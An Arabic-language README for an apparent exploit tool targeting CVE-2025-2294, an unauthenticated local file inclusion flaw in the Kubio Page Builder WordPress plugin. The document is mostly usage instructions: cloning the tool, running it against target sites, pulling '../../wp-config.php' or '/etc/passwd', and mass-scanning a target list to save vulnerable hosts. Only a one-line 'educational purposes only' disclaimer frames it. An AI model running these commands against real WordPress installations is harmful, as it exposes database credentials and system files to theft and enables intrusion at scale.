
أداة استغلال لتضمين الملفات المحلية (LFI) في إضافة Kubio Page Builder لـ WordPress (الإصدارات ≤ 2.5.1).
تستغل هذه الأداة ثغرة LFI غير مصادق عليها في إضافة Kubio Page Builder (CVE-2025-2294)، مما يسمح للمهاجمين بقراءة الملفات الحساسة في تثبيتات WordPress المعرضة للخطر.
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
هذه الأداة مخصصة للأغراض التعليمية فقط. المطوّر غير مسؤول عن أي إساءة استخدام. احصل دائمًا على إذن مناسب قبل اختبار أي أنظمة.
| الخيار | الوصف |
|---|
-u, --url | رابط الهدف الفردي |
-l, --list | ملف يحتوي على قائمة الأهداف |
-f, --file | الملف المراد قراءته (الافتراضي: /etc/passwd) |
-o, --output | حفظ الأهداف المعرضة للخطر في ملف |